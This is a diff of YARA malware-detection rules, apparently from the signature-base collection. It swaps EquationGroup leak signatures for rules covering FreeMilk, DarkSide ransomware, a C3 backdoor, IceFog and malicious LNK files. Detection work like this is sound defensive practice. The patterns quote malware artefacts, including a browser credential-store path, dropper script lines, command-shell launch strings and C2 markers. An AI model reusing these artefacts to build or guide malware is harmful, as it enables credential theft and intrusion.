 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "722d3cf03908629bc947c4cca7ce3d6b80590a04616f9df8f05c02de2d482fb2"
+		hash1 = "7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df"
 
 	strings:
-		$s1 = "USAGE: SetPorts <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]" fullword ascii
-		$s2 = "Valid versions are:  1 = PC 1.2   2 = PC 1.2 (24 hour)" fullword ascii
+		$s1 = "failed to take the screenshot. err: %d" fullword ascii
+		$s2 = "runsample" fullword wide
+		$s3 = "%s%02X%02X%02X%02X%02X%02X:" fullword wide
+		$s4 = "win-%d.%d.%d-%d" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "b86f7d2c1c182ec4c074ae1e16b7a3f5" or all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Grdo_Filescanner_Implant : FILE
+rule SIGNATURE_BASE_Freemilk_APT_Mal_3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects malware from FreeMilk campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "79a3cc02-0cda-59e2-8698-29a6cb0a3061"
-		date = "2017-04-15"
-		modified = "2023-01-06"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2670-L2686"
+		id = "152781f0-756b-50ab-b588-4af5fa4ce419"
+		date = "2017-10-05"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_freemilk.yar#L62-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ae88d27f41dd4888c445c654c919b3862fe3fc8c92aef816b22b2fb408a49cce"
+		logic_hash = "be68f624a2a374525857193d27f0645be5d10c198954dd90350448c3127e4bb5"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8d2e43567e1360714c4271b75c21a940f6b26a789aa0fce30c6478ae4ac587e4"
+		hash1 = "ef40f7ddff404d1193e025081780e32f88883fa4dd496f4189084d772a435cb2"
 
 	strings:
-		$s1 = "system32\\winsrv.dll" fullword wide
-		$s2 = "raw_open CreateFile error" fullword ascii
-		$s3 = "\\dllcache\\" wide
+		$s1 = "CMD.EXE /C \"%s\"" fullword wide
+		$s2 = "\\command\\start.exe" wide
+		$s3 = ".bat;.com;.cmd;.exe" fullword wide
+		$s4 = "Unexpected failure opening HKCR key: %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Msgks_Mskgu : FILE
+
+rule SIGNATURE_BASE_Freemilk_APT_Mal_4 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects malware from FreeMilk campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1692848d-a8db-5c11-9dc4-f1b0c45a78c3"
-		date = "2017-04-15"
+		id = "44f919f7-8eda-5e70-88d5-9e81a761192c"
+		date = "2017-10-05"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2688-L2704"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_freemilk.yar#L80-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d3a230d29997ab247db2b7a2a0f369206513a98c16f744e2fb1fca6495d5e36b"
+		logic_hash = "deedb1da7e3421cd300fceea354a690e22005bab16eb0cc20b46f912393b637d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7b4986aee8f5c4dca255431902907b36408f528f6c0f7d7fa21f079fa0a42e09"
-		hash2 = "ef906b8a8ad9dca7407e0a467b32d7f7cf32814210964be2bfb5b0e6d2ca1998"
+		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
 
 	strings:
-		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
-		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
-		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
+		$x1 = "base64Encoded=\"TVqQAAMAAAAE" ascii
+		$s1 = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command" fullword wide
+		$s2 = "'Wscript.echo \"Base64 encoded: \" + base64Encoded" fullword ascii
+		$s3 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
+		$s4 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii
+		$s5 = "set shell = WScript.CreateObject(\"WScript.Shell\")" fullword ascii
+		$s6 = "command =outFile &\" sysupdate\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( ( pe.exports ( "getUpdate" ) and pe.number_of_exports == 1 ) or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ifconfig_Target : FILE
+rule SIGNATURE_BASE_LNK_Malicious_Nov1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects a suspicious LNK file"
 		author = "Florian Roth (Nextron Systems)"
-		id = "db8ec377-a9f6-5d75-a123-aa0365d98065"
-		date = "2017-04-15"
+		id = "1d08ac78-6ff0-5e3f-acc2-91bd63267d4c"
+		date = "2017-11-06"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2706-L2722"
+		reference = "https://www.virustotal.com/en/file/ee069edc46a18698fa99b6d2204895e6a516af1a306ea986a798b178f289ecd6/analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_link.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e88f589bed7830a1be81c85c9eb77b7f5c14bef2f0f1b3be6293aa9c5e870278"
-		score = 75
-		quality = 85
+		logic_hash = "a1aa29497a0e4741807e3d74d54be69061aed21524c5f901615bd21e2ef13c67"
+		score = 60
+		quality = 81
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1ebfc0ce7139db43ddacf4a9af2cb83a407d3d1221931d359ee40588cfd0d02b"
 
 	strings:
-		$s1 = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\%hs" fullword wide
-		$op1 = { 0f be 37 85 f6 0f 85 4e ff ff ff 45 85 ed 74 21 }
-		$op2 = { 4c 8d 44 24 34 48 8d 57 08 41 8d 49 07 e8 a6 4b }
+		$c1 = "C:\\Windows\\System32\\cmd.exe" ascii wide
+		$s1 = "cmd.exe /" ascii wide nocase
+		$s2 = { 00 25 00 53 00 79 00 73 00 74 00 65 00 6D 00 52
+              00 6F 00 6F 00 74 00 25 00 5C 00 53 00 79 00 73
+              00 74 00 65 00 6D 00 33 00 32 00 EF 01 2F 00 43
+              00 20 00 22 00 63 00 6D 00 64 00 2E 00 65 00 78
+              00 65 }
+		$s3 = "%comspec%" ascii wide nocase fullword
+		$fp1 = "Microsoft Visual" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		( uint32( 0 ) == 0x0000004c and filesize < 4KB and $c1 and 1 of ( $s* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Darkside_May21_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Darkside Ransomware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
-		date = "2017-04-15"
+		id = "e5592065-591e-597b-bebb-f20bc306fe52"
+		date = "2021-05-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2724-L2739"
+		reference = "https://app.any.run/tasks/020c1740-717a-4191-8917-5819aa25f385/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_darkside.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3ee7a1284e2abd0282606c22b9112bd1af536e5fd48ef27e8d9216da8e1fb1c5"
+		logic_hash = "84de92b0b36e373aa61e314a04597bd0578a04af34c501ae9071e5f4fa27c07a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6"
+		hash1 = "ec368752c2cf3b23efbfa5705f9e582fc9d6766435a7b8eea8ef045082c6fbce"
 
 	strings:
-		$op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 }
-		$op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 }
-		$op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 }
+		$op1 = { 85 c9 75 ed ff 75 10 ff b5 d8 fe ff ff ff b5 dc fe ff ff e8 7d fc ff ff ff 8d cc fe ff ff 8b 8d cc fe ff ff }
+		$op2 = { 66 0f 6f 06 66 0f 7f 07 83 c6 10 83 c7 10 49 85 c9 75 ed 5f }
+		$op3 = { 6a 00 ff 15 72 0d 41 00 ab 46 81 fe 80 00 00 00 75 2e 6a ff 6a 01 }
+		$op4 = { 0f b7 0c 5d 88 0f 41 00 03 4c 24 04 89 4c 24 04 83 e1 3f 0f b7 14 4d 88 0f 41 00 03 54 24 08 89 54 24 08 83 e2 3f }
+		$s1 = "http://darksid" ascii
+		$s2 = "[ Welcome to DarkSide ]" ascii
+		$s3 = ".onion/" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them or all of ( $op* ) or all of ( $s* )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dsz_Implant : FILE
+rule SIGNATURE_BASE_MAL_Ransomware_Win_DARKSIDE_V1_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "febc8654-7dc3-5c8b-a53c-f8d7dc29b14b"
-		date = "2017-04-15"
+		description = "Detection for early versions of DARKSIDE ransomware samples based on the encryption mode configuration values."
+		author = "FireEye"
+		id = "322a3de5-a7e5-52b9-8648-6019954e92d7"
+		date = "2021-03-22"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2741-L2755"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_darkside.yar#L25-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3d76131a42aed642a8c54076544488a8d24ec16416469813324541d72e30101b"
+		hash = "1a700f845849e573ab3148daef1a3b0b"
+		logic_hash = "b3612510bd1f2ca7543e217e97037b02d312bcda2b2df16d9be3216749ea4beb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fbe103fac45abe4e3638055a3cac5e7009166f626cf2d3049fb46f3b53c1057f"
-		hash2 = "ad1dddd11b664b7c3ad6108178a8dade0a6d9795358c4a7cedbe789c62016670"
 
 	strings:
-		$s1 = "%02u:%02u:%02u.%03u-%4u: " fullword ascii
+		$consts = { 80 3D [4] 01 [1-10] 03 00 00 00 [1-10] 03 00 00 00 [1-10] 00 00 04 00 [1-10] 00 00 00 00 [1-30] 80 3D [4] 02 [1-10] 03 00 00 00 [1-10] 03 00 00 00 [1-10] FF FF FF FF [1-10] FF FF FF FF [1-30] 03 00 00 00 [1-10] 03 00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $consts
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Genkey : FILE
+rule SIGNATURE_BASE_MAL_Dropper_Win_Darkside_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "54e15017-a2f7-5135-af88-b13ea5866c5f"
-		date = "2017-04-15"
+		description = "Detection for on the binary that was used as the dropper leading to DARKSIDE."
+		author = "FireEye"
+		id = "910a581c-25a4-5d5e-acdc-6d87cbedd3cf"
+		date = "2021-05-11"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2757-L2770"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_darkside.yar#L39-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cdaa33645d0ea614891fc0579937e983b8b4f6c4830191518dc8272791dcc8df"
+		logic_hash = "131b3666ae444e0de043eafdf7cfd3324b927d18d8ad56d5004ea09b2da5610e"
 		score = 75
-		quality = 85
+		quality = 79
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b6f100b21da4f7e3927b03b8b5f0c595703b769d5698c835972ca0c81699ff71"
 
 	strings:
-		$x1 = "* PrivateEncrypt -> PublicDecrypt FAILED" fullword ascii
+		$CommonDLLs1 = "KERNEL32.dll" fullword
+		$CommonDLLs2 = "USER32.dll" fullword
+		$CommonDLLs3 = "ADVAPI32.dll" fullword
+		$CommonDLLs4 = "ole32.dll" fullword
+		$KeyString1 = { 74 79 70 65 3D 22 77 69 6E 33 32 22 20 6E 61 6D 65 3D 22 4D 69 63 72 6F 73 6F 66 74 2E 57 69 6E 64 6F 77 73 2E 43 6F 6D 6D 6F 6E 2D 43 6F 6E 74 72 6F 6C 73 22 20 76 65 72 73 69 6F 6E 3D 22 36 2E 30 2E 30 2E 30 22 20 70 72 6F 63 65 73 73 6F 72 41 72 63 68 69 74 65 63 74 75 72 65 3D 22 78 38 36 22 20 70 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D 22 36 35 39 35 62 36 34 31 34 34 63 63 66 31 64 66 22 }
+		$KeyString2 = { 74 79 70 65 3D 22 77 69 6E 33 32 22 20 6E 61 6D 65 3D 22 4D 69 63 72 6F 73 6F 66 74 2E 56 43 39 30 2E 4D 46 43 22 20 76 65 72 73 69 6F 6E 3D 22 39 2E 30 2E 32 31 30 32 32 2E 38 22 20 70 72 6F 63 65 73 73 6F 72 41 72 63 68 69 74 65 63 74 75 72 65 3D 22 78 38 36 22 20 70 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D 22 31 66 63 38 62 33 62 39 61 31 65 31 38 65 33 62 22 }
+		$Slashes = { 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		filesize < 2MB and filesize > 500KB and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and ( all of ( $CommonDLLs* ) ) and ( all of ( $KeyString* ) ) and $Slashes
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Wmi_Implant : FILE
+rule SIGNATURE_BASE_MAL_Backdoor_Win_C3_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e058d2cc-b963-55bc-9bdd-468f64fe8e6f"
-		date = "2017-04-15"
+		description = "Detection to identify the Custom Command and Control (C3) binaries."
+		author = "FireEye"
+		id = "60eb022e-6f4e-5c7d-9ddf-b458a593071e"
+		date = "2021-05-11"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2772-L2785"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_darkside.yar#L58-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "69754b6f26292aa1a457c71d079d934ce75794624c38e9d19c84ceb77a5fb26d"
+		hash = "7cdac4b82a7573ae825e5edb48f80be5"
+		logic_hash = "369c54b9426edb449004466d30e1010ecefe8cfbea106306eb8eb90b27610dbf"
 		score = 75
-		quality = 85
+		quality = 79
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "de08d6c382faaae2b4b41b448b26d82d04a8f25375c712c12013cb0fac3bc704"
 
 	strings:
-		$x1 = "SELECT ProcessId,Description,ExecutablePath FROM Win32_Process" fullword ascii
+		$dropboxAPI = "Dropbox-API-Arg"
+		$knownDLLs1 = "WINHTTP.dll" fullword
+		$knownDLLs2 = "SHLWAPI.dll" fullword
+		$knownDLLs3 = "NETAPI32.dll" fullword
+		$knownDLLs4 = "ODBC32.dll" fullword
+		$tokenString1 = { 5B 78 5D 20 65 72 72 6F 72 20 73 65 74 74 69 6E 67 20 74 6F 6B 65 6E }
+		$tokenString2 = { 5B 78 5D 20 65 72 72 6F 72 20 63 72 65 61 74 69 6E 67 20 54 6F 6B 65 6E }
+		$tokenString3 = { 5B 78 5D 20 65 72 72 6F 72 20 64 75 70 6C 69 63 61 74 69 6E 67 20 74 6F 6B 65 6E }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+		filesize < 5MB and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and ( ( ( all of ( $knownDLLs* ) ) and ( $dropboxAPI or ( 1 of ( $tokenString* ) ) ) ) or ( all of ( $tokenString* ) ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Clocksvc : FILE
+rule SIGNATURE_BASE_Mywscript_Compiledscript : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects a scripte with default name Mywscript compiled with Script2Exe (can also be a McAfee tool https://community.mcafee.com/docs/DOC-4124)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec0e90a5-1359-55e5-9165-494f90431247"
-		date = "2017-04-15"
+		id = "a0480a8a-5a7e-5829-851b-7301cfc9da60"
+		date = "2017-07-27"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2787-L2807"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mywscript_dropper.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "04cdd8e4ca9df0231ca66caa8083eff1fe0834cdedc4360fce0a934970a6d162"
-		score = 75
+		logic_hash = "5619de9589e3d34026bf4ec223f2c6b94fcb7362c8f3c26f7582030cfc4385cf"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c1bcd04b41c6b574a5c9367b777efc8b95fe6cc4e526978b7e8e09214337fac1"
+		hash1 = "515f5188ba6d039b8c38f60d3d868fa9c9726e144f593066490c7c97bf5090c8"
 
 	strings:
-		$x1 = "~debl00l.tmp" fullword ascii
-		$x2 = "\\\\.\\mailslot\\c54321" fullword ascii
-		$x3 = "\\\\.\\mailslot\\c12345" fullword ascii
-		$x4 = "nowMutex" fullword ascii
-		$s1 = "System\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate" fullword ascii
-		$s2 = "000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B98" ascii
-		$s3 = "00000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88" ascii
+		$x1 = "C:\\Projets\\vbsedit_source\\script2exe\\Release\\mywscript.pdb" fullword ascii
+		$s1 = "mywscript2" fullword wide
+		$s2 = "MYWSCRIPT2" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( $x1 or 2 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Xxxridearea : FILE
+rule SIGNATURE_BASE_Icefog_Malware_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects IceFog malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2475778b-1246-5471-b305-a946c253c50c"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2809-L2825"
+		id = "ce8e3a9b-9f4b-534c-983d-bb5490da5768"
+		date = "2018-02-26"
+		modified = "2023-01-06"
+		reference = "https://twitter.com/ClearskySec/status/968104465818669057"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_icefog.yar#L11-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4d2eeabbb3bb27f46232fe0a43f0ecda9f3589dbe6b08fd4f8aac14f6d12090b"
+		logic_hash = "8bba0f7f6f6aad6586c2c5ed29f30514d2f88703134f331724cc2ff86ccffe87"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "214b0de83b04afdd6ad05567825b69663121eda9e804daff9f2da5554ade77c6"
+		hash1 = "480373cffc4e60aa5be2954a156e37d689b92e6e33969958230f2ce59d30b9ec"
 
 	strings:
-		$x1 = "USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]" fullword ascii
-		$x2 = "The output payload \"%s\" has a size of %d-bytes." fullword ascii
-		$x3 = "ERROR: fwrite(%s) failed on ucPayload" fullword ascii
-		$x4 = "Load and execute implant within the existing thread" fullword ascii
+		$s1 = "cmd /c %c%s%c" fullword ascii
+		$s2 = "temp.bat" fullword ascii
+		$s3 = "c:\\windows\\debug\\wia\\help" fullword wide
+		$s4 = "/getorder.aspx?hostname=" fullword wide
+		$s5 = "\\filecfg_temp.dat" wide
+		$s6 = "Unknown operating system " fullword wide
+		$s7 = "kastygost.compress.to" fullword wide
+		$s8 = "/downloads/" wide
+		$s9 = "\\key.dat" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 4 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Yak_Min_Install : FILE
+rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Core_PDF : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dc648deb-4220-5ec3-b95f-ff6cc463f79b"
-		date = "2017-04-15"
+		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF"
+		author = "Symantec Security Response"
+		id = "2e8ccce9-d8ba-573d-b532-76d8e2ed5442"
+		date = "2015-01-22"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2827-L2842"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L3-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f224c87c5626fee98dae5b4bbab2b4468bdd126ac63371ede53545d7cb177123"
+		logic_hash = "a854926a4a98eb1d13a582b4ff4504b9740b8bbe7aa6b5192aeb4d2438a58926"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f67214083d60f90ffd16b89a0ce921c98185b2032874174691b720514b1fe99e"
 
 	strings:
-		$s1 = "driver start" fullword ascii
-		$s2 = "DeviceIoControl Error: %d" fullword ascii
-		$s3 = "Phlook" fullword ascii
+		$a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/
+		$b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint32( 0 ) == 0x46445025 and #a > 150 and #b > 200
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setouraddr : FILE
+rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Dll
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a2dbfa7b-3fb6-56cf-9391-1a3abb08e3cb"
-		date = "2017-04-15"
+		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component"
+		author = "Symantec Security Response"
+		id = "2aae09a3-6e59-5951-941e-c1f82aada979"
+		date = "2015-01-22"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2844-L2858"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L17-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d49bcef48afeb63b763c88443930f28be1d6f9f27d5f0bd9161d151fa3081868"
+		logic_hash = "f29ff81d62bd6bea776aeddc0725b034624f836c234441f63a8b697e959d3f8d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
